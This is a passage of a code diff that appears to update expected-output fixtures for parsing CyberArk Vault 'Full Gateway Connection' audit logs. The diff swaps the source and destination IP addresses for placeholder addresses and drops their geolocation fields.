\u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:05\",\"IsoTimestamp\":\"2021-03-11T17:38:05Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PSMPGW_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"81.32.170.205\"}}}", + "ingested": "2021-12-09T13:36:39.546311200Z", + "original": "\u003c5\u003e1 2021-03-11T17:38:05Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:05\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:05Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e19\u003c/MessageID\u003e\\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPGW_VAGRANT\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:05\",\"IsoTimestamp\":\"2021-03-11T17:38:05Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PSMPGW_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"67.43.156.13\"}}}", "code": "19", "kind": "event", "action": "full gateway connection", @@ -541,23 +505,11 @@ } }, "destination": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "source": { "user": { @@ -589,7 +541,7 @@ ], "ip": [ "10.0.2.2", - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -597,9 +549,9 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-11T17:48:22Z", - "gateway_station": "81.32.170.205", + "gateway_station": "67.43.156.13", "station": "10.0.2.2", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:48:22\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:48:22Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e19\u003c/MessageID\u003e\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\n \u003cSourceUser\u003ePSMPGW_VAGRANT\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:48:22\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:48:22Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e19\u003c/MessageID\u003e\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\n \u003cSourceUser\u003ePSMPGW_VAGRANT\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Full Gateway Connection", "source_user": "PSMPGW_VAGRANT", "message": "Full Gateway Connection", @@ -613,8 +565,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:29.025139500Z", - "original": "\u003c5\u003e1 2021-03-11T17:48:22Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:48:22\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:48:22Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e19\u003c/MessageID\u003e\\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPGW_VAGRANT\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\\n \u003cGatewayStation\u003e81.32.170.205\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:48:22\",\"IsoTimestamp\":\"2021-03-11T17:48:22Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PSMPGW_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.2.2\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"81.32.170.205\"}}}", + "ingested": "2021-12-09T13:36:39.546316700Z", + "original": "\u003c5\u003e1 2021-03-11T17:48:22Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:48:22\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:48:22Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e19\u003c/MessageID\u003e\\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPGW_VAGRANT\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:48:22\",\"IsoTimestamp\":\"2021-03-11T17:48:22Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PSMPGW_VAGRANT\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.2.2\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"67.43.156.13\"}}}", "code": "19", "kind": "event", "action": "full gateway connection", @@ -644,22 +596,11 @@ "ip": "10.0.1.20" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "35.192.121.42", "user": { "name": "PVWAGWUser" }, - "ip": "35.192.121.42" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" @@ -683,7 +624,7 @@ "Administrator" ], "ip": [ - "35.192.121.42", + "67.43.156.14", "10.0.1.20" ] }, @@ -693,8 +634,8 @@ "rfc5424": true, "iso_timestamp": "2021-03-11T18:02:57Z", "gateway_station": "10.0.1.20", - "station": "35.192.121.42", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 10:02:57\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T18:02:57Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e19\u003c/MessageID\u003e\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\n \u003cSourceUser\u003ePVWAGWUser\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e35.192.121.42\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.14", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 10:02:57\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T18:02:57Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e19\u003c/MessageID\u003e\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\n \u003cSourceUser\u003ePVWAGWUser\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.14\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Full Gateway Connection", "source_user": "PVWAGWUser", "message": "Full Gateway Connection", @@ -708,8 +649,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:29.025143600Z", - "original": "\u003c5\u003e1 2021-03-11T18:02:57Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 10:02:57\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T18:02:57Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e19\u003c/MessageID\u003e\\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\\n \u003cSourceUser\u003ePVWAGWUser\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e35.192.121.42\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 10:02:57\",\"IsoTimestamp\":\"2021-03-11T18:02:57Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PVWAGWUser\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"35.192.121.42\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"10.0.1.20\"}}}", + "ingested": "2021-12-09T13:36:39.546322Z", + "original": "\u003c5\u003e1 2021-03-11T18:02:57Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 10:02:57\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T18:02:57Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e19\u003c/MessageID\u003e\\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\\n \u003cSourceUser\u003ePVWAGWUser\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.14\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 10:02:57\",\"IsoTimestamp\":\"2021-03-11T18:02:57Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway Connection\",\"SourceUser\":\"PVWAGWUser\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Full Gateway Connection\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "19", "kind": "event", "action": "full gateway connection", @@ -732,39 +673,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.71.250.247", "user": { "name": "Administrator" }, - "ip": "34.71.250.247" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "PSMPGW_SSH" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -788,8 +708,8 @@ "Administrator" ], "ip": [ - "81.32.170.205", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { @@ -797,9 +717,9 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-14T13:49:35Z", - "gateway_station": "34.71.250.247", - "station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:49:35\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:49:35Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e19\u003c/MessageID\u003e\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\n \u003cSourceUser\u003ePSMPGW_SSH\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\n \u003cGatewayStation\u003e34.71.250.247\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "gateway_station": "67.43.156.15", + "station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:49:35\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:49:35Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e19\u003c/MessageID\u003e\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\n \u003cSourceUser\u003ePSMPGW_SSH\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Full Gateway Connection", "source_user": "PSMPGW_SSH", "message": "Full Gateway Connection", @@ -813,8 +733,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:29.025147600Z", - "original": "\u003c5\u003e1 2021-03-14T13:49:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:35\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:35Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e19\u003c/MessageID\u003e\\n \u003cDesc\u003eFull Gateway Connection\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eFull Gateway Connection\u003c/Action\u003e\\n \u003cSourceUser\u003ePSMPGW_SSH\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eFull Gateway Connection\u003c/Message\u003e\\n \u003cGatewayStation\u003e34.71.250.247\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:49:35\",\"IsoTimestamp\":\"2021-03-14T13:49:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"19\",\"Desc\":\"Full Gateway Connection\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Full Gateway 